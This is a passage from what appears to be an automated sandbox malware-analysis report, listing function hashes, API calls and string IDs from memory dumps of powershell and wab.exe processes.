                    • Instruction Fuzzy Hash: 88B11BB1B042079FDB248B6585D87BEBBE2AF85210F24C06BD505EF352DB32C942C7A1
                    Function 07C68550 Relevance: 9.1, Strings: 7, Instructions: 375COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: Tk$0Uq$4'q$4'q$4'q$4'q$DUk
                    • API String ID: 0-363130008
                    • Opcode ID: 1d63553968ba8b86acc74e626e961dda327ce5b6c1de0373729a3cdf644864c8
                    • Instruction ID: 686edd588e48f9780f726423e514a76904c42df2a1ea36d60e0ee0b17402ba02
                    • Opcode Fuzzy Hash: 1d63553968ba8b86acc74e626e961dda327ce5b6c1de0373729a3cdf644864c8
                    • Instruction Fuzzy Hash: 08C14DB1B04216CFDB24CB69D4C966ABBE2AFC9214F18C07AD505DF251DB31CD42C7A2
                    Function 07C67A38 Relevance: 9.0, Strings: 7, Instructions: 243COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$4'q$tPq$tPq$$q$$q$$q
                    • API String ID: 0-2432477355
                    • Opcode ID: 313411898d31c0a3a71feeac3c9cc5d44b113ea4331516e7f1adb746e59783f7
                    • Instruction ID: ff06a92b859c89a43b48d027ff94710d1d3cc6751b717cfc8ac4619b4ecfc6d4
                    • Opcode Fuzzy Hash: 313411898d31c0a3a71feeac3c9cc5d44b113ea4331516e7f1adb746e59783f7
                    • Instruction Fuzzy Hash: E5817DB17043169FD7258B6984C8766BBF1AFC6624F1888ABD405DF292DB31CE41C7A1
                    Function 07C60470 Relevance: 8.9, Strings: 7, Instructions: 178COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$4'q$$q$$q$$q$$q$$q
                    • API String ID: 0-1894156552
                    • Opcode ID: c0e8196534c1bc82232815bc35767979ea411f5dc80fb0bb5019b3d87e50d33e
                    • Instruction ID: 300ee688675758e0db9898de108295586b3bd196354d6984483933a8201b99cf
                    • Opcode Fuzzy Hash: c0e8196534c1bc82232815bc35767979ea411f5dc80fb0bb5019b3d87e50d33e
                    • Instruction Fuzzy Hash: 49515BF1B047179FDB245A2595D8BBE7BA29FC1210F14806AD902BF255EF31CA82C7E1
                    Function 07C6A240 Relevance: 7.8, Strings: 6, Instructions: 263COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$4'q$tPq$$q$$q$$q
                    • API String ID: 0-4281836607
                    • Opcode ID: 1dba1331cdd423f341c90300cd2a2b087a6baa1835766b113c458bb2424a3f35
                    • Instruction ID: 92e07abf116f170bb173868e2b0f0360733c09d5576384dc8b8826015b46703c
                    • Opcode Fuzzy Hash: 1dba1331cdd423f341c90300cd2a2b087a6baa1835766b113c458bb2424a3f35
                    • Instruction Fuzzy Hash: 9791D4F0B04606DFDB24CA55C5CCBBEBBE2AF85214F18C0A6D505BB255DB31DA40CB62
                    Function 07C6DE38 Relevance: 7.7, Strings: 6, Instructions: 209COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$4'q$$q$$q$$q$$q
                    • API String ID: 0-1538229613
                    • Opcode ID: 238c7d152d7ce050b1e4bdde782da793bc0caa2da05de1e9eddd757c16b42f95
                    • Instruction ID: b5dd6de168e5fa39cf12d6143accd8a6fc0e6b08dd561cdb8f4c11d40c71d068
                    • Opcode Fuzzy Hash: 238c7d152d7ce050b1e4bdde782da793bc0caa2da05de1e9eddd757c16b42f95
                    • Instruction Fuzzy Hash: 9361E9B5B0421ADFDF289E66D4C86BAB7A1AFC5211F14C07AE406CF255DB31CA42C7A1
                    Function 07C6B500 Relevance: 6.5, Strings: 5, Instructions: 204COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$4'q$tPq$$q$$q
                    • API String ID: 0-293283741
                    • Opcode ID: 07236141f9254c70bf416629c4bc8f441ca4bd92e8f20b6eed318ef8d9ab7b0c
                    • Instruction ID: bd1128d65c5e70a5ad164ad8c86a5553312a7152f1568b238acfb60b0a595ce3
                    • Opcode Fuzzy Hash: 07236141f9254c70bf416629c4bc8f441ca4bd92e8f20b6eed318ef8d9ab7b0c
                    • Instruction Fuzzy Hash: EA71B4F0A04206DFDB248F15D5C9BAABBB1AF85710F38806AD505DF255D731DE41CBA1
                    Function 07C6E0F0 Relevance: 5.4, Strings: 4, Instructions: 407COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (oq$(oq$(oq$(oq
                    • API String ID: 0-3853041632
                    • Opcode ID: 2b2835ad4e6368edbfe8e93143402a42c71126b7c3b3d8480061545e7a164f4d
                    • Instruction ID: 97af81137173533a4e4c109a7553bd1d90d237162814f20f3af4f62701c1387b
                    • Opcode Fuzzy Hash: 2b2835ad4e6368edbfe8e93143402a42c71126b7c3b3d8480061545e7a164f4d
                    • Instruction Fuzzy Hash: 18D138B5B08346CFDB159F79C8D87AABBA2FF86210F14846BE5058F291DB31C942C761
                    Function 07C69BD8 Relevance: 5.2, Strings: 4, Instructions: 163COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$4'q$$q$$q
                    • API String ID: 0-3199993180
                    • Opcode ID: 6d6749941e69e313eed216f1818b4c004b59fddd7823f6986681ae1a223e6e9c
                    • Instruction ID: 14713e7cd6dcd075deee947cdc8dc4f5da9dac5db78c5dad8563a48ebb53e2aa
                    • Opcode Fuzzy Hash: 6d6749941e69e313eed216f1818b4c004b59fddd7823f6986681ae1a223e6e9c
                    • Instruction Fuzzy Hash: 76510BB5B043469FC724CB6994C86AAB7F2AFC6610F28807FC506DF255DB31E942CB61
                    Function 07C69630 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: $q$$q$$q$$q
                    • API String ID: 0-4102054182
                    • Opcode ID: 97391e9d7a4ae3cd46ffac5864f63fd090f8487471c576e49226758864879829
                    • Instruction ID: a5495decb98f6221c61df4181ec9fa4ca128a1e862a059c63cdca6dae9c0bf5c
                    • Opcode Fuzzy Hash: 97391e9d7a4ae3cd46ffac5864f63fd090f8487471c576e49226758864879829
                    • Instruction Fuzzy Hash: AC2144B17103069BEB744A6A8DC8B77B79A9BC1714F24803EE509DF381DE72E9018261
                    Function 07C6A8AF Relevance: 5.1, Strings: 4, Instructions: 68COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: $q$$q$$q$$q
                    • API String ID: 0-4102054182
                    • Opcode ID: 4a1cec778cc8d63194f90fd0300d463cbd4d207fb3e4f5b09a902c46e6c18cea
                    • Instruction ID: da1bb140a1770cef3ae8a7400e7f0769a1b555b3843173ced1889c6a4e7ac3a0
                    • Opcode Fuzzy Hash: 4a1cec778cc8d63194f90fd0300d463cbd4d207fb3e4f5b09a902c46e6c18cea
                    • Instruction Fuzzy Hash: 1D1190B5A04307CFDB208E5689C92BEB7B0AF45250F2AC06AD804BB201E731C685C761
                    Function 07C6A893 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: $q$$q$$q$$q
                    • API String ID: 0-4102054182
                    • Opcode ID: c546c5ee3d1a2deec9f228149b5b130f31d4c0dfa861ec33137490d4be7c268e
                    • Instruction ID: e8c650cd3256a2f7168994e84f192f4750de09955277ed47029f165e97296d1c
                    • Opcode Fuzzy Hash: c546c5ee3d1a2deec9f228149b5b130f31d4c0dfa861ec33137490d4be7c268e
                    • Instruction Fuzzy Hash: 9901D8F6618347CFDB3509669CC927EBB716F62105F3E80ABC8407A156FA25C655C322
                    Function 07C60308 Relevance: 5.0, Strings: 4, Instructions: 50COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$4'q$$q$$q
                    • API String ID: 0-3199993180
                    • Opcode ID: c070fbd0c54677eb913d8996cd6d9ce40287f09bd4c7eb715abe9e499ed39336
                    • Instruction ID: c2eaf9352473c7858fb432c3cca929fc8cc506c87171b90838141af0a07f3831
                    • Opcode Fuzzy Hash: c070fbd0c54677eb913d8996cd6d9ce40287f09bd4c7eb715abe9e499ed39336
                    • Instruction Fuzzy Hash: D801F7617093A68FC72A025918A57B55B729BC3561B1D40A7C051FF392CE148D8683A7

                    Non-executed Functions

                    Function 00E01C5C Relevance: 61.9, APIs: 31, Strings: 4, Instructions: 637registrymemorywindowCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00E01CC6
                    • GetCommandLineW.KERNEL32 ref: 00E01CCE
                    • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?), ref: 00E01D0E
                    • LoadStringW.USER32(00000000,000007D1,?,00000104), ref: 00E01D49
                    • LoadIconW.USER32 ref: 00E01D84
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00E01D96
                    • GetStockObject.GDI32(00000000), ref: 00E01DA3
                    • RegisterClassW.USER32(00000003), ref: 00E01DCD
                    • CreateWindowExW.USER32(00000000,Contacts Viewer,?,00CF0000,00000000,00000000,0000012C,000000C8,00000000,00000000,00000000), ref: 00E01DF8
                    • GetLastError.KERNEL32 ref: 00E01E22
                    • FreeLibrary.KERNEL32(?), ref: 00E0201B
                    • FreeLibrary.KERNEL32(?), ref: 00E0256C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2440184985.0000000000E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 0000000E.00000002.2440105897.0000000000E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E05000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E07000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E1D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_e00000_wab.jbxd
                    Similarity
                    • API ID: Load$FreeLibrary$ClassCommandCreateCursorErrorHeapIconInformationLastLineObjectRegisterStockStringWindowmemset
                    • String ID: $API Entered$Contacts Viewer$WABOpen
                    • API String ID: 328653217-1327836325
                    • Opcode ID: a0d6659531b99221411711cd001961525c1b5b3d7573d7eec61edacf9a5c60e1
                    • Instruction ID: b4a6e5ca8741fa2aae8d2adef520d44e06d662433f67dddafd1cd666ea2330bd
                    • Opcode Fuzzy Hash: a0d6659531b99221411711cd001961525c1b5b3d7573d7eec61edacf9a5c60e1
                    • Instruction Fuzzy Hash: 2932B2B1A002199FDB248B55DC89BEA76F9BF48304F0450E9EA09BB2E0DB759DC4CF50
                    Function 00E025D3 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 211COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00E0261B
                    • memset.MSVCRT ref: 00E02633
                    • CommandLineToArgvW.SHELL32(00000000,?,?,?,?,00000000,00000000,00000001), ref: 00E0264D
                    • StrCmpNIW.SHLWAPI(?,/LDAP:,00000006,?,?,?,00000000,00000000,00000001), ref: 00E0268D
                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,00000001), ref: 00E0287E
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2440184985.0000000000E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 0000000E.00000002.2440105897.0000000000E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E05000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E07000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E1D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_e00000_wab.jbxd
                    Similarity
                    • API ID: memset$ArgvCommandFreeLineLocal
                    • String ID: /LDAP:
                    • API String ID: 439219084-3282177907
                    • Opcode ID: 569929377dd9a946e406670d104d0c660f40c2cebee82f8501b5bfb98f02ee23
                    • Instruction ID: e05a834b2b05180be4b6861aebbcf4051f4de87d02710e44fa8975f14631d7b3
                    • Opcode Fuzzy Hash: 569929377dd9a946e406670d104d0c660f40c2cebee82f8501b5bfb98f02ee23
                    • Instruction Fuzzy Hash: 1E816F75A002189BDB28DB24DC8DAAAB3F9EF54304F1491EDE619B7291D731DEC48F60
                    Function 00E03675 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                    Download Yara Rule
                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00E036A2
                    • GetCurrentProcessId.KERNEL32 ref: 00E036B1
                    • GetCurrentThreadId.KERNEL32 ref: 00E036BA
                    • GetTickCount.KERNEL32 ref: 00E036C3
                    • QueryPerformanceCounter.KERNEL32(?), ref: 00E036D8
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2440184985.0000000000E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 0000000E.00000002.2440105897.0000000000E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E05000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E07000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E1D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_e00000_wab.jbxd
                    Similarity
                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                    • String ID:
                    • API String ID: 1445889803-0
                    • Opcode ID: c157eff5be8d66e5d2508ae1dd1640508fceea7da5829ec27c69b15bf8632f61
                    • Instruction ID: 88fe5fe4dc952cdcd74f2a7ac40b656f23dbddbcf43fd39a8425aae468113ac7
                    • Opcode Fuzzy Hash: c157eff5be8d66e5d2508ae1dd1640508fceea7da5829ec27c69b15bf8632f61
                    • Instruction Fuzzy Hash: 40110AB2D01208EFCB10DFB9EA4869EBBF8EF48355F514859D502F7250E6319A848F41
                    Function 00E032C0 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E033F6,`@), ref: 00E032C7
                    • UnhandledExceptionFilter.KERNEL32(00E033F6,?,00E033F6,`@), ref: 00E032D0
                    • GetCurrentProcess.KERNEL32(C0000409,?,00E033F6,`@), ref: 00E032DB
                    • TerminateProcess.KERNEL32(00000000,?,00E033F6,`@), ref: 00E032E2
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2440184985.0000000000E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 0000000E.00000002.2440105897.0000000000E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E05000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E07000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E1D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_e00000_wab.jbxd
                    Similarity
                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                    • String ID:
                    • API String ID: 3231755760-0
                    • Opcode ID: fa0be008d7436cc3023f43c59b2fc30b87a1623ea6ecff211d5f454a8d184017
                    • Instruction ID: eb89a98ed77b7ee35c80a4ec30294981f19652147e0bd09f3ae34ca707f94e86
                    • Opcode Fuzzy Hash: fa0be008d7436cc3023f43c59b2fc30b87a1623ea6ecff211d5f454a8d184017
                    • Instruction Fuzzy Hash: 07D0C933000504EFDB002BE2EC0CE5E3E28FB44312F444400F30DE6020CA7248998FA1
                    Function 00E01AE4 Relevance: 2.5, APIs: 2, Instructions: 28memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,?,00000000,00000001,00E02589), ref: 00E01B09
                    • HeapFree.KERNEL32(00000000), ref: 00E01B10
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2440184985.0000000000E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 0000000E.00000002.2440105897.0000000000E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E05000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E07000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E1D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_e00000_wab.jbxd
                    Similarity
                    • API ID: Heap$FreeProcess
                    • String ID:
                    • API String ID: 3859560861-0
                    • Opcode ID: 96709484bfc672697627a91c738a82bf1137b050f12627438e15c2ea9f7900af
                    • Instruction ID: 8e089c7d7f13a1e55ab498cac0a1a4f0e38584885a3677c3dcf790886ae487a0
                    • Opcode Fuzzy Hash: 96709484bfc672697627a91c738a82bf1137b050f12627438e15c2ea9f7900af
                    • Instruction Fuzzy Hash: 68E06D72601701CFCB344FAA8994927BBE8FF04309314596EE59AA7550C731D880CF10
                    Function 00E03450 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_00003400), ref: 00E03455
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2440184985.0000000000E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 0000000E.00000002.2440105897.0000000000E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E05000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E07000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E1D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_e00000_wab.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 80c4c868367f0720852b5336d6857a6b43ac42f896736f11cae96f0d2e665878
                    • Instruction ID: da7ca08daa12b7f1b0f2a206d02a664434c6db5545ace6a70c10caecb4a3033e
                    • Opcode Fuzzy Hash: 80c4c868367f0720852b5336d6857a6b43ac42f896736f11cae96f0d2e665878
                    • Instruction Fuzzy Hash: 919002613556008AC60117B15C1E60A29946B4870B7821450A015E9098DA6145855951
                    Function 00E03530 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2440184985.0000000000E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 0000000E.00000002.2440105897.0000000000E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E05000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E07000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E1D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_e00000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: 5
                    • API String ID: 0-3632891597
                    • Opcode ID: a766d3b511325246591146fa678ec37a36ce2690c67ca02a39aa05bc8c5beb23
                    • Instruction ID: 1c14c3ad0c0019eda83934c904905cf302bb2d1d23fd1ba899c8d4b34152cd2b
                    • Opcode Fuzzy Hash: a766d3b511325246591146fa678ec37a36ce2690c67ca02a39aa05bc8c5beb23
                    • Instruction Fuzzy Hash: 03F0A7337041115BCB448B5EDC8097EB3DEDAC47347299069E50897251DA34ED828294
                    Function 00E03030 Relevance: 13.6, APIs: 9, Instructions: 144sleepCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E03675: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00E036A2
                      • Part of subcall function 00E03675: GetCurrentProcessId.KERNEL32 ref: 00E036B1
                      • Part of subcall function 00E03675: GetCurrentThreadId.KERNEL32 ref: 00E036BA
                      • Part of subcall function 00E03675: GetTickCount.KERNEL32 ref: 00E036C3
                      • Part of subcall function 00E03675: QueryPerformanceCounter.KERNEL32(?), ref: 00E036D8
                    • GetStartupInfoW.KERNEL32(?,00E03838,00000058), ref: 00E0304F
                    • Sleep.KERNEL32(000003E8), ref: 00E03084
                    • _amsg_exit.MSVCRT ref: 00E03099
                    • _initterm.MSVCRT ref: 00E030ED
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00E03119
                    • exit.MSVCRT ref: 00E0318F
                    • _ismbblead.MSVCRT ref: 00E031AA
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2440184985.0000000000E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 0000000E.00000002.2440105897.0000000000E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E05000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E07000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E1D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_e00000_wab.jbxd
                    Similarity
                    • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                    • String ID:
                    • API String ID: 836923961-0
                    • Opcode ID: 73b951405806bb3e84718247ff85b7960b4153b46b42c3f3911815cefd569648
                    • Instruction ID: 7c0f4e09359d0b955d1478508649ef636da3beb502b2c7e496022ff1974a87db
                    • Opcode Fuzzy Hash: 73b951405806bb3e84718247ff85b7960b4153b46b42c3f3911815cefd569648
                    • Instruction Fuzzy Hash: B14114B1905715CFDB259BBAD90536AB7ECEB48724F20301AEA41B72D1CB758EC48B90
                    Function 00E028A4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 76registryCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00E028DE
                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 00E0290A
                    • RegQueryValueExW.ADVAPI32(?,00E011FC,00000000,?,?,?,?,00000000,00000000), ref: 00E0293F
                    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 00E0295F
                    • GetFileAttributesW.KERNEL32(?,?,00000000,00000000), ref: 00E0296E
                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000), ref: 00E02997
                    Strings
                    • Software\Microsoft\WAB\DLLPath, xrefs: 00E02900
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2440184985.0000000000E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 0000000E.00000002.2440105897.0000000000E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E05000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E07000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E1D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_e00000_wab.jbxd
                    Similarity
                    • API ID: AttributesCloseEnvironmentExpandFileOpenQueryStringsValuememset
                    • String ID: Software\Microsoft\WAB\DLLPath
                    • API String ID: 2763597636-3156921957
                    • Opcode ID: 355301f2e8a6aa13962af0e985cc388e1791c1040a35a92a3aa5569e4a359c92
                    • Instruction ID: a5c5bcee0b21c73ec98960e903036409e2528be3c838c82345801803106dfdb0
                    • Opcode Fuzzy Hash: 355301f2e8a6aa13962af0e985cc388e1791c1040a35a92a3aa5569e4a359c92
                    • Instruction Fuzzy Hash: 9D2151B194121CAEDB209B658D8CEEFB7FCAF94714F5012DAA519F2190D7704BC8CEA1
                    Function 00E02A7E Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 90memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,?,?,00000000,m(,?,00E02BA4,?,?,8000FFFF,00000000,?,?,?,00E0286D,?), ref: 00E02ACC
                    • HeapAlloc.KERNEL32(00000000,?,00E02BA4,?,?,8000FFFF,00000000,?,?,?,00E0286D,?,?), ref: 00E02AD3
                    • memcpy.MSVCRT ref: 00E02AEB
                    • GetProcessHeap.KERNEL32(00000000,?,?,00E02BA4,?,?,8000FFFF,00000000,?,?,?,00E0286D,?,?), ref: 00E02B37
                    • HeapFree.KERNEL32(00000000,?,00E02BA4,?,?,8000FFFF,00000000,?,?,?,00E0286D,?,?), ref: 00E02B3E
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2440184985.0000000000E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 0000000E.00000002.2440105897.0000000000E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E05000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E07000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E1D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_e00000_wab.jbxd
                    Similarity
                    • API ID: Heap$Process$AllocFreememcpy
                    • String ID: m(
                    • API String ID: 3405790324-3056937451
                    • Opcode ID: e1fdfef4ed2a74eec398db3794d09ddc1a0ec16d8ca55108d208f30d4f9be69c
